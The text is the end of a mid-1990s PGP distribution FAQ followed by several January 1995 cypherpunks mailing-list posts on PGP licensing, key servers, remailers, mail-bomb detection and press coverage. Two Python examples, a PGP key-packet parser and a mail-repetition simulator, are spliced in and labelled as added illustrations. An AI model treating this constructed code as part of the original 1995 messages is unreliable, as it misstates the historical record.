     * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

    Spanish
     * _IT:_
     ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
     * _FI:_
       ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz

    Swedish
     * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
     * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt


MAILING LIST FOR PGP AND RELATED TOPICS  (PGP MAILING LIST IN GERMAN)

The list address:

        pgp-friends@fiction.pb.owl.de

The *request* address (for subscribe/unsubscribe and other administrative
matters):

        pgp-friends-request@fiction.pb.owl.de


WHAT IS ALL THIS NONSENSE ABOUT EXPORT CONTROLS?

For a detailed rant, get ftp://ftp.csn.net/mpj/cryptusa.zip


WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN THE USA?

MIT PGP is only for personal, noncommercial use because of restrictions on
the licensing of both the RSA algorithm (attached to RSAREF) and the IDEA
algorithm.  PKP/RSADSI insist that we use RSAREF instead of the mpi library
for reasons that make sense to them.

For commercial use, use Viacrypt PGP, which is fully licensed to use both the
RSA and IDEA algorithms in commercial and corporate environments (as well as
personal use, of course).

Another restriction is due to an exclusive marketing agreement between Philip
Zimmermann and Viacrypt that applies to the USA and Canada only.  Viacrypt
has exclusive rights to market PGP commercially in this area of the world.
This means that if you want to market PGP commercially in competition with
Viacrypt in the USA or Canada, you would have to create a new implementation
of the functions of PGP containing none of Philip Zimmermann's copyrighted
code.  You are free to modify existing PGP code for your own use, as long as
you don't sell it.  Phil would also appreciate your checking with him before
you distribute any modified versions of PGP as freeware.

"PGP", "Pretty Good Privacy" and "Phil's Pretty Good Software" are trademarks
owned by Philip Zimmermann.  This means that if you modify an older version of
PGP that was issued under the copyleft license and distribute it without
Phil's permission, you have to call it something else.  This avoids confusing
all of us and protects Phil's good name.


WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN CANADA?

MIT PGP is only for noncommercial use because of restrictions on the
licensing of the IDEA algorithm.  Because the RSA algorithm isn't patented in
Canada, you are free to use the mpi library instead of RSAREF, if you want
to, thus freeing yourself of the RSAREF license associated with the RSAREF
copyright, which is valid in Canada.

For commercial use, use Viacrypt PGP, which is fully licensed to use the IDEA
algorithm in commercial and corporate environments.

The exclusive marketing agreement with Viacrypt also applies in Canada.  See
the section on USA intellectual property restrictions for more details.


WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST OUTSIDE NORTH AMERICA?

MIT PGP is only for noncommercial use in areas where there is a patent on
software implementations of the IDEA algorithm.  Because the RSA algorithm
isn't patented outside of the USA, you are free to use the mpi library
instead of RSAREF, if you want to, thus freeing yourself of the RSAREF
license restrictions.  The RSAREF copyright holds outside of the USA, even
though the RSA patent does not.

The IDEA conventional block cipher is covered by US Patent 5,214,703 and
European patent EP 0 482 154 B1.  IDEA is a trademark of Ascom-Tech AG.
Commercial users of IDEA (including commercial use of PGP) may obtain
licensing details from

Ph. Baumann, IDEA Lizenz
Ascom Tech AG
Postfach 151
CH-4502 Solothurn
Switzerland

Tel ++41 65 242828, Fax ++41 65 242847.


WHAT IS COMMERCIAL USE?

Use some common sense.  If you are running a business and using PGP to
protect credit card numbers sent to you electronically, then you are using
PGP commercially.  Your customers, however, need not buy the commercial
version of PGP just to buy something from you, if that is the only commercial
use they make of PGP (since they are spending, not making, money with PGP).

If you are just encrypting love letters or other personal mail (for which you
don't get paid) on your own personal computer, that is not commercial.  If
you are encrypting official business mail on your for-profit corporation's
computer with PGP, that is commercial use.

Note that there are some gray areas not covered above, and the patent owners
of RSA and IDEA may differ from my interpretation in the areas not covered
above, so if you are in doubt, you should consider the licensing of Viacrypt
PGP (or outside of North America, direct licensing of IDEA) to be cheap legal
insurance.  Indeed, the license fee is probably a lot cheaper than a legal
opinion from a lawyer qualified to make such a judgement.  Note that I am not
a lawyer and the above is not legal advice.  Use it at your own risk.


ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS?

If your RSA key modulus length is less than or equal to 1024 bits (I don't
recommend less, unless you have a really slow computer and little patience),
and if your key was generated in the PKCS format, then it will work with any
of the current PGP versions (MIT PGP 2.6, PGP 2.6ui, or Viacrypt PGP 2.7). If
this is not the case, you really should generate a new key that qualifies.

MIT PGP 2.6.2 should be able to use 2048 bit keys.  Generation of 2048 bit
keys was supposed to automatically be enabled in PGP 2.6.2 in December, 1994,
but a bug caused the actual key limit to be 2047 bits.


MORE WORLD WIDE WEB URLs

  http://draco.centerline.com:8080/~franl/pgp/pgp-mac-faq-hinely.html
  http://draco.centerline.com:8080/~franl/pgp/pgp.html
  http://draco.centerline.com:8080/~franl/crypto/cryptography.html
  http://www.pegasus.esprit.ec.org/people/arne/pgp.html
  http://rschp2.anu.edu.au:8080/crypt.html
  http://ibd.ar.com/PublicKeys.html
  http://www.ifi.uio.no/~staalesc/PGPversions.html

WINDOWS SHELLS

Several shells for running PGP with Microsoft Windows are available at the
same places PGP can be found.


MACPGP KIT

ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx


BUGS

See the documentation that comes with PGP in the latest versions for bugs in
the older versions.

The latest versions of PGP may not fully wipe all traces of plain text from a
file when given the -w option.

For more information, see http://www.mit.edu:8001/people/warlord/pgp-faq.html


BETSI - BELLCORE'S TRUSTED SOFTWARE INTEGRITY SYSTEM

For information on this service, send mail to certify@bellcore.com with the
subject help, or check http://info.bellcore.com/BETSI/betsi.html


INTEGRATING PGP AND PINE

Send blank e-mail to slutsky@lipschitz.sfasu.edu with Subject: mkpgp to get a
c-shell script to interface PGP and Pine.  Send a second message with
Subject: addtomkpgplist
if you want updates sent you automatically.


HOW DO I PUBLISH MY PGP PUBLIC KEY?

There are lots of ways.  One way is to use a key server.  Send mail to one of
these addresses with the single word "help" in the subject line to find out
how to use a key server.

        pgp-public-keys@pgp.iastate.edu
        pgp-public-keys@pgp.mit.edu
        pgp-public-keys@pgp.ai.mit.edu
        public-key-server@pgp.ai.mit.edu
        pgp-public-keys@cs.tamu.edu
        pgp-public-keys@chao.sw.oz.au
        pgp-public-keys@jpunix.com
        pgp-public-keys@dsi.unimi.it
        pgp-public-keys@kiae.su
        pgp-public-keys@fbihh.informatik.uni-hamburg.de

        There is also an experimental public key server at
        http://ibd.ar.com/PublicKeys.html

There is an excellent commercial key certification and publication service,
too.  For $20/year or so, you can have your key officially certified and
published in a "clean" key database that is much less susceptible to
denial-of-service attacks than the other key servers.  People need not pay
any fees to retrieve keys so published.  Send mail to info-pgp@Four11.com for
information, or look at http://www.Four11.com/

You can also mail your key to pgp-public-keys@c2.org, and it will be posted
to the subscribers of that mailing list, sent to the keyservers, and posted
to alt.security.keydist.  To subscribe to the mailing list, send a message to
majordomo@c2.org with "subscribe pgp-public-keys" in the body of the message.

Another way is to upload it to the PGP public keys area of the Colorado
Catacombs BBS (303-772-1062).  Another way is to just send it to your
correspondents.  You could add it to your .plan file so that finger returns
your key.  You could add it to some of your postings.  No matter which way you
do it, you should have your key signed by someone who verifies that your key
belongs to you, so that you don't have someone else generating a key that has
your name on it, but that isn't yours.

Here is my public key:



TIME STAMP SERVICES

Mail sent to Time S. Tamp <timestamp@lorax.mv.com> will be returned, signed
with its own private key.


REPRODUCING THIS FAQ

Permission is granted to distribute unmodified copies of this FAQ.

To get the latest version of this FAQ, get
ftp://ftp.netcom.com/pub/mp/mpj/getpgp.asc or send mail to
ftp-request@netcom.com with the line
SEND mp/mpj/getpgp.asc
in the body of the message, or send blank mail to mpjohnso@nyx.cs.du.edu.
This FAQ is also archived at rtfm.mit.edu with a very long file name.

There are many other frequently asked questions.  Most of them are covered in
the documentation that comes with PGP or in one of the books about PGP.

Send corrections to mpj@netcom.com.  I regret that I lost some of the
corrections people sent me on the last round of this FAQ, so if I missed
yours, please send it again.  Thanks.

                  ___________________________________________________________
 |\  /| |        |                                                           |
 | \/ |o|        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 |    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
 |    ||| \ \_/  |___________________________________________________________|


-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAgUBLxvrHPX0zg8FAL9FAQHz9AQAjdyLzJ2L+PSkqL0nZ4ULiq4ReHdYfLrX
DlBvkM9JG0jCgpDmcWkWg4IEUwJ8VoKnjFYaUgbw3CkCoIZYRekXrUkRgoZSq5TV
BdADxEXJabF7It3e6jH2ICVNSYdsfe/4xh+8F7v7CKzSZubtwaLOIbZ+CSBVi3D0
3iyn6+zrZVo=
=5zak
-----END PGP SIGNATURE-----
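
As an added illustration of the key-size rule in the FAQ's "ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS?" section (not part of the original message and not PGP's own code), this Python example reads the modulus length from a PGP 2.x RSA public-key packet and sorts it into the size bands the FAQ gives. The packet layout is the one documented in RFC 1991, which the FAQ does not describe; the function names, band labels and sample moduli are constructed for the example, and the FAQ's second condition (PKCS format) is not checked.

```python
import struct

PUBLIC_KEY_PACKET = 6   # packet type held in bits 5-2 of an old-format CTB
RSA = 1                 # public-key algorithm byte for RSA


def encode_mpi(value):
    """Multiprecision integer: 16-bit bit count, then big-endian magnitude."""
    bits = value.bit_length()
    return struct.pack(">H", bits) + value.to_bytes((bits + 7) // 8, "big")


def build_pubkey_packet(n, e, timestamp=0, validity_days=0):
    """Serialise a version 3 RSA public-key packet (used for the sample input)."""
    body = (bytes([3]) + struct.pack(">IH", timestamp, validity_days)
            + bytes([RSA]) + encode_mpi(n) + encode_mpi(e))
    return bytes([0x99]) + struct.pack(">H", len(body)) + body


def read_mpi(buf, offset):
    """Return (value, next_offset), rejecting truncated or mislabelled MPIs."""
    if offset + 2 > len(buf):
        raise ValueError("truncated MPI header")
    (bits,) = struct.unpack_from(">H", buf, offset)
    end = offset + 2 + (bits + 7) // 8
    if end > len(buf):
        raise ValueError("truncated MPI body")
    value = int.from_bytes(buf[offset + 2:end], "big")
    if value.bit_length() != bits:
        raise ValueError("MPI bit count does not match its value")
    return value, end


def parse_pubkey_packet(packet):
    """Parse one old-format public-key packet and report its modulus size."""
    if len(packet) < 2:
        raise ValueError("packet too short")
    ctb = packet[0]
    if not ctb & 0x80 or ctb & 0x40:
        raise ValueError("not an old-format packet header")
    if (ctb >> 2) & 0x0F != PUBLIC_KEY_PACKET:
        raise ValueError("not a public-key packet")
    length_size = {0: 1, 1: 2, 2: 4}.get(ctb & 0x03)
    if length_size is None:
        raise ValueError("indeterminate-length packets are not handled here")
    header = 1 + length_size
    if len(packet) < header:
        raise ValueError("truncated packet header")
    length = int.from_bytes(packet[1:header], "big")
    body = packet[header:header + length]
    if len(body) != length or length < 8:
        raise ValueError("truncated packet body")
    version, algorithm = body[0], body[7]
    if version not in (2, 3) or algorithm != RSA:
        raise ValueError("not a PGP 2.x RSA key")
    timestamp, validity_days = struct.unpack_from(">IH", body, 1)
    n, offset = read_mpi(body, 8)
    e, offset = read_mpi(body, offset)
    if offset != length:
        raise ValueError("unexpected trailing bytes")
    return {"version": version, "timestamp": timestamp,
            "modulus_bits": n.bit_length(), "exponent": e}


def faq_size_band(modulus_bits):
    """Map a modulus length onto the size bands stated in the FAQ text."""
    if modulus_bits > 2047:
        return "over-2047"            # above the actual limit reported for MIT PGP 2.6.2
    if modulus_bits > 1024:
        return "mit-2.6.2-limit"      # outside the FAQ's all-versions rule
    if modulus_bits < 1024:
        return "all-versions-below-recommended"
    return "all-versions"


def sample_modulus(bits):
    """Constructed odd integer of exactly `bits` bits; NOT a real RSA modulus."""
    return (1 << (bits - 1)) | 1


if __name__ == "__main__":
    for bits in (512, 1024, 2047, 2048):
        packet = build_pubkey_packet(sample_modulus(bits), 17)
        info = parse_pubkey_packet(packet)
        print(info["modulus_bits"], "->", faq_size_band(info["modulus_bits"]))
```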




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 19 Jan 95 08:20:17 PST
To: cypherpunks@toad.com
Subject: internet mag
Message-ID: <199501191620.IAA22714@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This month's issue of Internet World Magazine deals primarily with internet security. I am not going to review everything in the mag but I'll list the table of contents:

Better Safe:
Danger lurks on the Info Highway. You must take precaution to reduce your risks.
By Dave Taylor and Rosalind Resnick

Getting Cryptic:
Phil Zimmermann's PGP gives you powerful encryption to keep your messages safe from prying eyes. Read all about it.
By William Stallings.
(Introductory article about PGP. Nothing we, here, don't already know)

Securing the Enterprise:
Connecting your corporation to the Internet can be a security nightmare.
Firewalls are the main line of defense.
By Alton Hoover
(An overview of Firewalls, application-layer gateways and token-based authentication schemes)

Beyond the Firewall:
The latest  firewall technology not only detects intruders, but strikes back.
By Winn Schwartau
(Very interesting article. Here are some quotes to whet your appetite:
Wouldn't it be nice if a computer system attacked from the Internet responded to the attack by striking back at the intruder? This is exactly what Sidewinder's implementation of type enforcement does.....It will detect the intrusion immediately....As soon as a violation occurs, a silent alarm is activated....sidewinder can be configured to react in any number of ways, once an attack has been detected...it can shut the intruder cold...(or)...it can invoke a mechanism that would record all the information from whence came the attack....By luring the attacker into a false sense of security, the hacker would continue trying to break in, unaware that every step was being recorded...)

Cashing In:
As Internet commerce expands, a host of companies are vying to establish their system as the basis for cyberbanking and credit-card transactions.
By Lisa Morgan

Business Browser:
New versions of Mosaic with built-in encryption promise to keep your transactions safe.
By Richard W. Wiggins

Unlawful Entry
Crackers can feast on your data if you fail to plug your leaky Unix system
By Aaron Weiss
(Five Ways to crack a Unix System)

It's Alive:
Although the furor has subsided, reports of Clipper's death are greatly exaggerated. The government's controversial eavesdropping effort lives on.
By Steven Vaughan-Nichols

Building Trust
The chief executives of Trusted Information Systems -Steve Crocker and Steve Walker- talk about encryption, CyberCash, Clipper, and more.
By Jeff Ubois.

All in all a rather interesting mag. Check it out.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard@alpha.c2.org
Give me the liberty to know, to utter, and to argue freely
according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: habs@cmyk.warwick.com (Harry S. Hawk)
Date: Thu, 19 Jan 95 06:38:47 PST
To: cypherpunks@toad.com (Good Guys)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190459.UAA26969@netcom12.netcom.com>
Message-ID: <9501191738.AA23269@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Lance Rose is a good guy... IMHO..

1) I use his legal services

2) I haven't read the article but it seems reasonable esp. if 
   we don't have NON-Escrowed encryption...

   e.g., if clipper wins I think Lance is probably correct...

3) he can be reached at 72230.2044@compuserve.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 19 Jan 95 06:41:35 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Lance Rose writes anti-cryptoanarchy in WIRED
In-Reply-To: <199501190404.UAA24779@netcom6.netcom.com>
Message-ID: <9501191441.AA03662@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
> (?). When I met him a couple of years ago, he'd just gotten out of
> jail and was working for the satellite Usenet distribution company
> (whose name I don't recall, and who I've heard less of than I might've
> expected to, subjunctively speaking).

Don't confuse Len Rose and Lance Rose.

One is indeed a lawyer -- in fact, he's my lawyer.

Perry

Who notes that he's not the only person shooting from the hip these
days.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stuart@surety.com (Stuart Haber)
Date: Thu, 19 Jan 95 07:10:45 PST
To: cypherpunks@toad.com
Subject: Surety Technologies announces: Digital Notary System is on-line
Message-ID: <9501191509.AA00167@surety.com>
MIME-Version: 1.0
Content-Type: text/plain


Many readers of this list have heard about the work that Scott
Stornetta and I have done, beginning as Bellcore researchers a few
years ago, on the problem of cryptographically secure digital
time-stamping.  In 1993 Bellcore spun off a company in order to
commercialize this work.  The company is called Surety Technologies,
and we call our product and service the Digital Notary(tm) System.

I am happy to report that we have just launched the product.  To
read about it, as well as to get the software, please visit our
World-Wide Web home page:

	http://www.surety.com

You can get the software and installation instructions directly by
anonymous ftp to ftp.surety.com in the directory /dns/windows.

Scott and I would both like to thank those readers of the list
who have offered us their support, encouragement, and advice over
the years.

Stuart Haber              | Surety Technologies provides
Chief Scientist           | the Digital Notary(tm) System.
Surety Technologies, Inc. | General info: info@surety.com
stuart@surety.com         | (201) 701-0600, fax -0601




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 19 Jan 95 02:12:54 PST
To: eric@remailer.net
Subject: Internet, spamming, etc.
Message-ID: <9501191012.AA04837@pero>
MIME-Version: 1.0
Content-Type: text/plain


> From owner-cypherpunks@toad.com Wed Jan 18 17:00:14 1995
> Date: Wed, 18 Jan 1995 07:54:00 -0800
> I also think this is the one great flaw in the design of the Internet;
> namely, that the sender has all the control over what packets flow
> over the net.  A receiver can ask for a slowdown or cessation, but
> there's no obligation to do so.  This will be, if anything, the
> limiting factor in scalability of the internet.

In theory, yes. 

However, almost all Internet protocols are TCP/IP based.
The receiver of a TCP connection can choose not to accept
the connection, or to drop it at any time. The window protocol
keeps the sender from transmitting faster than any part of
the connection can manage. (How do you think ftp transfers
between sites with disparate connection speeds would 
work otherwise?)

One could theoretically have a package that sprayed UDP packets
at a particular IP address, or even have a modified TCP
that ignored disconnects. I think most service providers
would regard using such code as being on a par with running
a program that tried to telnet sequentially to all known IP
addresses, trying common passwords on each.

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 08:45:58 PST
To: cypherpunks@toad.com
Subject: Re: JP vs Homer
Message-ID: <9501191645.AA26767@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


>     We are capable of controlling mail bombs, for instance, in the
>following way:
> 
>     Take an incoming message, capture From: line.  Strip header.  MD5 body.
>Add to sorted table [From: MD5(message) date].  Check for repetition of
>first two fields.  If reps = 1, forward message.  If reps = 2, send message
>to From:  "Possible error.  Two copies of message <message> received."  If
>reps = 0 mod 5, send letter to postmaster@From:.  "Possible mailbomb or
>spam.  <reps> copies of <message> received from <From:> at your site in the
>past week." Clear table of entries more than a week old every midnight.
> 
> 
>     If all remailers did this, then no matter where the net was entered,
>the messages would be rejected.  And spammers/bombers would be spamming/
>bombing their own postmaster.  Probably a bad idea.  If not all did it,
>then add special handling to hit remailer-operator@.  This would encourage
>the operator to auto-magically handle the spam-bomb himself.

This works only if one assumes that the exact same message is posted using
the exact same path.  Granted, it would probably be effective for novice
spammers.

Consider a premail/chain type script and a cleartext spam message.  The
script is executed once every five minutes, say.  When it runs, it creates a
new random path through the remailers, adding encryption wrappers for each
hop.  Your spam detector would miss this one completely unless your remailer
was used as the terminal remailer for a significant number of spams.  More
significantly, the MD5 hashes of each message would be different even if the
same path were used more than once because the PGP session key would be
different (again, unless your remailer would be the terminal remailer in the
particular path that repeated).
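
[Added example, not part of Jeff Licquia's message or of the proposal he quotes: a Python sketch of the [From:, MD5(body), date] repetition table, run on constructed messages, showing that it counts repeated cleartext bodies but sees every copy as new once each one is wrapped under a fresh session key. Assumptions: toy_wrap is a stand-in for a per-hop encryption wrapper and is not PGP, the "hold" action covers repetition counts the proposal leaves unspecified, and all addresses and bodies are constructed.]

```python
"""Repetition table from the quoted proposal, and the case it misses."""
import hashlib
import os
from datetime import datetime, timedelta

WEEK = timedelta(days=7)


def split_message(raw):
    """Capture the From: value and strip the header; returns (sender, body)."""
    head, _, body = raw.partition("\n\n")
    sender = ""
    for line in head.splitlines():
        if line.lower().startswith("from:"):
            sender = line[5:].strip().lower()
            break
    return sender, body


class RepetitionTable:
    """Rows of [From:, MD5(body), date], as in the proposal."""

    def __init__(self):
        self.rows = []

    def purge(self, now):
        """The nightly job: drop entries more than a week old."""
        self.rows = [row for row in self.rows if now - row[2] <= WEEK]

    def receive(self, raw, now):
        """Record one message and return (reps, action)."""
        sender, body = split_message(raw)
        # MD5 is what the 1995 proposal names; here it is only a dedup key.
        digest = hashlib.md5(body.encode("utf-8")).hexdigest()
        self.rows.append((sender, digest, now))
        reps = sum(1 for s, d, _ in self.rows if s == sender and d == digest)
        if reps == 1:
            return reps, "forward"
        if reps == 2:
            return reps, "warn-sender"
        if reps % 5 == 0:
            return reps, "notify-postmaster"
        return reps, "hold"  # assumption: other counts are unspecified


def toy_wrap(body, session_key=None):
    """Toy stand-in for an encryption wrapper (NOT PGP).

    A fresh random session key drives a SHA-256 keystream that is XORed
    with the body. Real PGP would encrypt the session key to the
    remailer's public key; it is carried in clear here because only the
    fact that the ciphertext changes on every run matters.
    """
    key = session_key or os.urandom(16)
    data = body.encode("utf-8")
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return (key + bytes(a ^ b for a, b in zip(data, stream))).hex()


def run_demo():
    start = datetime(1995, 1, 19, 8, 0)
    step = timedelta(minutes=5)
    body = "Constructed sample body: BUY NOW\n"

    # Case 1: same cleartext body five times. The Subject differs on each
    # copy, but headers are stripped before hashing, so reps still climbs.
    table = RepetitionTable()
    cleartext = [
        table.receive("From: Bulk@example.org\nSubject: run %d\n\n%s" % (i, body),
                      start + i * step)
        for i in range(5)
    ]

    # Case 2: same plaintext, each copy wrapped under a fresh session key,
    # as a non-terminal remailer would see it. Every digest is new.
    table = RepetitionTable()
    wrapped = [
        table.receive("From: remailer@example.net\n\n" + toy_wrap(body),
                      start + i * step)
        for i in range(5)
    ]

    # Case 3: an entry older than a week is purged, so the count restarts.
    table = RepetitionTable()
    table.receive("From: a@example.org\n\n" + body, start)
    later = start + timedelta(days=8)
    table.purge(later)
    after_purge = table.receive("From: a@example.org\n\n" + body, later)
    return cleartext, wrapped, after_purge


if __name__ == "__main__":
    for name, result in zip(("cleartext", "wrapped", "after_purge"), run_demo()):
        print(name, result)
```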





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 10:51:01 PST
To: jalicqui@prairienet.org (Jeff Licquia)
Subject: Re: The Remailer Crisis
In-Reply-To: <9501191716.AA08891@firefly.prairienet.org>
Message-ID: <199501191847.KAA28985@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff's response is exactly what I was hoping for! The "Cypherpunks
distribution" version of Linux would be a great way to spread cheap
remailer technology on cheap Linux boxes. Hell, I might even augment
my Macs with one of these things!

Jeff Licquia wrote:

> The "Linux mavens" followed by the "black box" stuff sparked an idea...
> 
> First, before delving into dreamland: I'm sure Linux could be hung off just
> about any store-and-forward (a la UUCP) or TCP/IP-based network there is
> with a minimum of trouble.

This is what I'd expect....I just don't know the details.

> Now how 'bout this: Consider a new distribution of Linux, the "Cypherpunk"
> distribution (if ya don't like the name, make up yer own!).  This would be a
> bare minimum of a distribution, with nothing fancy: bash, misc. utils like
> ls, etc.  This can fit (tightly) in 20 MB.  The supplied kernel would have
> every networking option under the sun turned on, but would be otherwise bare
> of frills as well.  Now let's add minimal network utils (telnet and telnetd
> for connecting and sendmail for obvious reasons), perl, PGP, and a remailer
> package.  To make it as easy as possible, I'd use the UMSDOS filesystem, so
> that Linux could be installed on a DOS machine without any reformatting,
> repartitioning, or similar headaches.

A great idea. This could be the "remailer in a box" we've been talking
about for a long time. Could also include a package of security and
crypto utilities, etc. Sort of what the "Gnu" folks might do if they
were involved in crypto. (By "involved in crypto" I mean of course
Cypherpunks sorts of concerns, which Stallman seems to have not much
interest in, at least publicly.)

> We could make this available via FTP or press some CD-ROMs if we were
> ambitious. Better yet, the cool Linux thing to do now is to install via NFS;
> this makes installing Linux as easy as sticking in a boot disk and pointing
> the install program at the NFS server (well, not quite, but pretty close).
> After adding in the cute little install program (like the Slackware
> distribution already has) and some boot options, you'd have an "instant
> remailer" software package, able to transform any 386SX/4MB RAM DOS machine
> or better into a Linux-based remailer site, complete with aliases, logging
> policies, etc. already configured for you. I bet even Tim May could install
> this if it were done right. :-)

Well, if I take the other side of the bet, that I *can't*, is that kosher?

> So, am I dreaming, or does this sound viable to y'all?

Sounds very good to me.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 09:17:01 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <9501191716.AA08891@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


>For example, the Linux mavens could tell us if Linux-based remailer
>boxes could be hung on dedicated connections to The Little Garden
>network, as a specific example. A "black box remailer" such as several
>folks have suggested (Chaum (in 1981), me, Eric Hughes, others) might be
>buildable for under a grand. We could ask here for contributions, and
>might even raise this amount of money. Then each of us who contributed
>could have "accounts," maybe several of them. Imagine 100 or more
>"remailers" all on this one machine--I'm deliberately ignoring the
>security issue for now. Little Garden has stated categorically that
>they will not tell users what they can or can't do with their machines
>(though I can think of some cases where they might have to, as with
>spamming, etc.). Anyway, you can see where I'm headed.

The "Linux mavens" followed by the "black box" stuff sparked an idea...

First, before delving into dreamland: I'm sure Linux could be hung off just
about any store-and-forward (a la UUCP) or TCP/IP-based network there is
with a minimum of trouble.

Linux junkies are familiar with the concept of "distributions".  For the
uninitiated, Linux itself is just a kernel; Linus Torvalds doesn't hold
anyone's hand when it comes to actually turning that kernel into a working
system.  As a result, people have done this job themselves: they build their
own working systems painstakingly from scratch and then archive it off to
disk or CD-ROM, which they sell or give away.  Most of the time, when you
get Linux, you're actually getting one of these "distributions" of Linux,
complete with all the frills that don't come with the kernel (like the
shell, basic utils, and so on).

Now how 'bout this: Consider a new distribution of Linux, the "Cypherpunk"
distribution (if ya don't like the name, make up yer own!).  This would be a
bare minimum of a distribution, with nothing fancy: bash, misc. utils like
ls, etc.  This can fit (tightly) in 20 MB.  The supplied kernel would have
every networking option under the sun turned on, but would be otherwise bare
of frills as well.  Now let's add minimal network utils (telnet and telnetd
for connecting and sendmail for obvious reasons), perl, PGP, and a remailer
package.  To make it as easy as possible, I'd use the UMSDOS filesystem, so
that Linux could be installed on a DOS machine without any reformatting,
repartitioning, or similar headaches.

We could make this available via FTP or press some CD-ROMs if we were
ambitious. Better yet, the cool Linux thing to do now is to install via NFS;
this makes installing Linux as easy as sticking in a boot disk and pointing
the install program at the NFS server (well, not quite, but pretty close).
After adding in the cute little install program (like the Slackware
distribution already has) and some boot options, you'd have an "instant
remailer" software package, able to transform any 386SX/4MB RAM DOS machine
or better into a Linux-based remailer site, complete with aliases, logging
policies, etc. already configured for you. I bet even Tim May could install
this if it were done right. :-)

So, am I dreaming, or does this sound viable to y'all?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 11:51:40 PST
To: cypherpunks@toad.com
Subject: "Time" Magazine and "Future Shock" Author
Message-ID: <199501191940.LAA09311@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



[I'm into my daily "blackout" of toad mail to Netcom, so am posting
blind, as usual. If this article has already been posted, my
condolences.]


The January 23rd issue of "Time," this week's issue, features a cover
story on talk shows, Limbaugh, Gingrich, and "HyperDemocracy." I
haven't seen the physical issue yet, but have skimmed the Web version
at:

http://www.timeinc.com/time/magazine/magazine.html

Point your browser at it and have fun.

Lots of folks are flaming the article, in the usual newsgroups (e.g.,
alt.data-highway). Me, I'm as scared as "Time" is about "direct,
electronic democracy," though perhaps for different reasons.

On a related note, the article and sidebars touch heavily on the
"cybergurus" who are advising Newt Gingrich on his journey into
cyberspace, notably Alvin Toffler ("Future Shock," "The Third Wave,"
"Powershift," etc.) and George Gilder ("Beyond Wealth and Poverty,"
"Macrocosm," lots of essays on the Net).

As it happens, I spent some time talking to Alvin and Heidi Toffler at
an interview last Friday in L.A.--they were being interviewed before
and after me. Not enough time to really get into issues, and of course
they did most of the talking (Heidi is especially opinionated, and had
just been in a highly publicized battle with newage guru Arianne
Huffington, spacey wife of losing candidate in California, Michael H.).

Anyway, we talked about John Brunner (as you all know, Brunner's
seminal "The Shockwave Rider," was inspired by "Future Shock") and his
ideas. (And we all agreed that "Stand on Zanzibar" was his crowning
achievement...even Shalmaneser admitted "Christ, what an imagination
he's got.")

Tidbits:

